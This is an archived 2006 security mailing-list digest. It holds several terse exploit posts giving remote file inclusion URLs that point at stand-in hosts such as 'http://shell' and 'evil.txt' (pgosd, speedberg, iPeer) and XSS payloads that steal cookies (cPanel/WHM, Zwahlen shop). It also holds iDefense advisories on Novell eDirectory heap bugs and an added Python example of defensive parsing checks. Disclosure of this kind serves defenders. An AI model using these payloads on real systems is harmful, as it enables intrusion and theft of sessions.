-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/misc/function.php3?path=http://evil_script?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, 
k1tk4t, x_w0x,OG

Thanks: DJR, mdx, R3D4C!D, sakkure, ENTRIKA, ERNE:)

www.milw0rm.com
www.team-rootshell.com
www.cyber-warrior.org
irc.milw0rm.com #milw0rm

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

script down: http://vidalcharles.free.fr/pgosd/pgosd.tgz

# milw0rm.com [2006-10-22]



WHM 10.8.0 cPanel 10.9.0 R50 CentOS 4.4 i686 WHM X v3.1.0 Xss Vulnerability

2006-10-23 Thread crackers_child

#
WHM 10.8.0 cPanel 10.9.0 R50 CentOS 4.4 i686 WHM X v3.1.0 Xss  Vulnerability
 
#

By Crackers_Child

[EMAIL PROTECTED]

www.sibersavacilar.com


#
Exploit
#


site.com:2082/scripts/dosetmytheme?theme=[XssCodes]

site.com:2082/scripts2/editzonetemplate?template=[XssCodes]

#

Examples


site.com:2082/scripts/dosetmytheme?theme=alert(document.cookie)

site.com:2082/scripts2/editzonetemplate?template=alert(document.cookie)

site.com:2082/scripts2/editzonetemplate?template=alert(/HACKED BY 
CRACKERS_CHİLD/)

#

Greetz:All My Friends !

#


### WWW.sibersavascilar.com  ##


speedberg <= 1.2beta1 Remote File Inclusion

2006-10-23 Thread k1tk4t

# speedberg <= 1.2beta1  Remote File Inclusion
# Download Source : http://www.myepfl.ch/speedberg/files/speedberg-1.2beta1.zip
#
# Found By: k1tk4t - k1tk4t[4t]newhack.org
# Location: Indonesia   --  #newhack[dot]org @irc.dal.net

file;
entrancePage.tpl.php
generalToolBox.tlb.php
myToolBox.tlb.php
scriplet.inc.php
simplePage.tpl.php
speedberg.class.php
standardPage.tpl.php

exploit;
http://localhost/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://shell

Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]


XSS in Zwahlen Online Shop

2006-10-23 Thread MC Iglo

Hi list,

there is an XSS in Zwahlen's Online Shop. I can only test the free
version, but I think other versions may be vulnerable, too.

http://host/article.htm?cat=alert("fix your bugs!")

Kind Regards
MC.Iglo


iDefense Security Advisory 10.21.06: Novell eDirectory evtFilteredMonitorEventsRequest Invalid Free Vulnerability

2006-10-23 Thread iDefense Labs
Novell eDirectory evtFilteredMonitorEventsRequest Invalid Free Vulnerability

iDefense Security Advisory 10.21.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 21, 2006

I. BACKGROUND

Novell eDirectory is a cross-platform lightweight directory access
protocol (LDAP) server. More information can be found on Novell's web
site at http://www.novell.com/products/edirectory/

II. DESCRIPTION

Remote exploitation of an invalid free vulnerability in Novell Inc.'s
eDirectory product could allow an attacker to execute arbitrary code in
the context of the running daemon.

The evtFilteredMonitorEventsRequest function takes an array of objects
that contain an allocated string and two integer values. When an
attacker supplies fewer objects than are specified by the number of
objects to be sent, an invalid free condition arises. Due to the cleanup
loop being bound by the number supplied within the request rather than
the number actually processed, the free() function will be called on
values on the heap which are outside of the bounds of the allocated
array.

III. ANALYSIS

Successful exploitation of this vulnerability could allow an attacker to
crash the server or execute arbitrary code. No credentials are required.
Typically this daemon runs with administrator privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested
and found to be vulnerable. Earlier versions are suspected to be
vulnerable.

V. WORKAROUND

It is possible to disable the LDAP service from running via the
ndsmodules.conf file which is usually located in
/etc/opt/novell/eDirectory/conf. However, doing so greatly reduces the
functionality of this program.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1.

You can obtain the Linux/Unix version of this update from their site at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/
The Windows version of this update is available at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-4510 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/17/2006  Initial vendor notification
08/18/2006  Initial vendor response
10/06/2006  Second vendor notification
10/20/2006  Vendor update released
10/21/2006  Public disclosure

IX. CREDIT

Joshua J. Drake (iDefense Labs) is credited with the discovery of this
vulnerability.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.




iDefense Security Advisory 10.21.06: Novell eDirectory NCP over IP length Heap Overflow Vulnerability

2006-10-23 Thread iDefense Labs
Novell eDirectory NCP over IP length Heap Overflow Vulnerability

iDefense Security Advisory 10.21.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 21, 2006

I. BACKGROUND

Novell eDirectory is a cross-platform lightweight directory access
protocol (LDAP) server. In addition to LDAP, eDirectory also implements
NCP over IP.  More information can be obtained from Novell's web
site at http://www.novell.com/products/edirectory/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Novell Inc.'s
eDirectory product could allow an attacker to execute arbitrary code in
the context of the running daemon.

This vulnerability specifically exists within the NCP functionality of
eDirectory.  A specially crafted packet will cause eDirectory to read a
user specified amount of user supplied data into a static sized heap
buffer.  The NCP engine does not verify that the supplied data will fit
inside the allocated heap buffer bounds.  As such, a heap buffer
overflow occurs.

III. ANALYSIS

Successful exploitation of this vulnerability could allow an attacker to
crash the server or execute arbitrary code. No credentials are required.
Typically this daemon runs with administrator privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested
and found to be vulnerable. Earlier versions are suspected to be
vulnerable.

V. WORKAROUND

iDefense is unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1.

You can obtain the Linux/Unix version of this update from their site at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/
The Windows version of this update is available at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/
 
VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-4177 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/16/2006  Initial vendor notification
08/17/2006  Initial vendor response
10/06/2006  Second vendor notification
10/20/2006  Vendor update released
10/21/2006  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.




iDefense Security Advisory 10.21.06: Novell eDirectory evtFilteredMonitorEventsRequest Heap Overflow Vulnerability

2006-10-23 Thread iDefense Labs
Novell eDirectory evtFilteredMonitorEventsRequest Heap Overflow
Vulnerability

iDefense Security Advisory 10.21.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 21, 2006

I. BACKGROUND

Novell eDirectory is a cross-platform lightweight directory access
protocol (LDAP) server. More information can be found on Novell's
web site at http://www.novell.com/products/edirectory/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Novell Inc.'s
eDirectory product could allow an attacker to execute arbitrary code in
the context of the running daemon.

This problem stems from an integer overflow that occurs when allocating
memory for attacker supplied data. The evtFilteredMonitorEventsRequest
function takes user input and multiplies it by 16, then adds 16 without
first validating that an integer overflow will not occur. If allocation
succeeds, the function will proceed to loop, filling the memory with
partially controllable input. Since the loop is bounded directly by the
attacker supplied length value, heap overflow will occur.

III. ANALYSIS

Successful exploitation of this vulnerability could allow an attacker to
crash the server or execute arbitrary code. No credentials are required.
Typically this daemon runs with administrator privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
8.8.1 of Novell Inc.'s eDirectory server. Version 8.8 was also tested
and found to be vulnerable. Earlier versions are suspected to be
vulnerable.

V. WORKAROUND

It is possible to disable the LDAP service from running via the
ndsmodules.conf file which is usually located in
/etc/opt/novell/eDirectory/conf. However, doing so greatly reduces the
functionality of this program.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability with eDirectory 8.8.1 FTF1.

You can obtain the Linux/Unix version of this update from their site at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.tgz/
The Windows version of this update is available at:
http://support.novell.com/servlet/filedownload/sec/pub/edir881ftf_1.exe/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-4509 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/17/2006  Initial vendor notification
08/18/2006  Initial vendor response
10/06/2006  Second vendor notification
10/20/2006  Vendor update released
10/21/2006  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
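
Added example, not eDirectory or NCP code; the message layout (a 32-bit count followed by records of a length-prefixed string and two 32-bit integers) is constructed for the demonstration and is not the real wire format. It shows the three checks the three eDirectory advisories above describe as missing: the size arithmetic for a caller-supplied count must not wrap (the count*16+16 case), a declared count or length must fit what the payload actually carries (the NCP length case), and cleanup must be bounded by what was processed, not by what was declared (the invalid free case).

```python
"""Added example; not eDirectory or NCP code. The message layout is
constructed for the demonstration, not the real wire format:
  u32 count, then per record: u16 string length, string bytes, u32, u32."""
import struct
from typing import List, Optional, Tuple

UINT32_MAX = 0xFFFFFFFF
RECORD_SLOT = 16              # per-object slot in the in-memory array (the "*16")
HEADER = 16                   # fixed overhead (the "+16")
MIN_WIRE_RECORD = 2 + 4 + 4   # smallest encodable record: empty string + two ints

Record = Tuple[bytes, int, int]


def alloc_size(count: int) -> Optional[int]:
    """Array size for count objects, or None if 32-bit arithmetic would wrap."""
    size = count * RECORD_SLOT + HEADER
    return size if size <= UINT32_MAX else None


def wrapped_alloc_size(count: int) -> int:
    """What unchecked 32-bit code computes for the same count."""
    return (count * RECORD_SLOT + HEADER) & UINT32_MAX


def encode_events(records: List[Record], declared_count: Optional[int] = None) -> bytes:
    """Build a message; declared_count lets a test lie about how many records follow."""
    n = len(records) if declared_count is None else declared_count
    out = struct.pack(">I", n)
    for s, a, b in records:
        out += struct.pack(">H", len(s)) + s + struct.pack(">II", a, b)
    return out


def parse_events(buf: bytes) -> Tuple[List[Record], Optional[str]]:
    """Parse a message; on any inconsistency return ([], reason)."""
    if len(buf) < 4:
        return [], "short header"
    (count,) = struct.unpack(">I", buf[:4])
    if alloc_size(count) is None:
        return [], "count would overflow allocation size"
    # The smallest record is MIN_WIRE_RECORD bytes, so a larger count can
    # never be satisfied by the bytes actually present.
    if count * MIN_WIRE_RECORD > len(buf) - 4:
        return [], "count exceeds what the payload can carry"
    records: List[Record] = []
    off = 4
    for _ in range(count):
        if off + 2 > len(buf):
            break
        (slen,) = struct.unpack(">H", buf[off:off + 2])
        off += 2
        if off + slen + 8 > len(buf):       # string length vs. remaining bytes
            break
        s = buf[off:off + slen]
        off += slen
        a, b = struct.unpack(">II", buf[off:off + 8])
        off += 8
        records.append((s, a, b))
    if len(records) != count:
        # Cleanup walks len(records) entries, never `count`: walking the
        # declared count is the invalid free the first advisory describes.
        parsed = len(records)
        records.clear()
        return [], f"truncated: declared {count}, parsed {parsed}"
    return records, None


if __name__ == "__main__":
    print(parse_events(encode_events([(b"obj", 1, 2), (b"", 3, 4)])))
    print(parse_events(encode_events([(b"x" * 20, 1, 2)], declared_count=2)))
    print(alloc_size(0x10000000), wrapped_alloc_size(0x10000000))
```

With count 0x10000000 the unchecked arithmetic yields an allocation of 16 bytes for a loop that intends to write 16 bytes per object, which is the shape of the integer-overflow report; the two bounds checks and the processed-count cleanup are the corresponding fixes.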




IPEER Remote file inclusion

2006-10-23 Thread navairum
Product:http://ipeer.apsc.ubc.ca/ipeer_site/
version: 2.0 (I assume others too)

vulnerability:
http://some_host/ipeer_site/?page=http://evilness/evil.txt?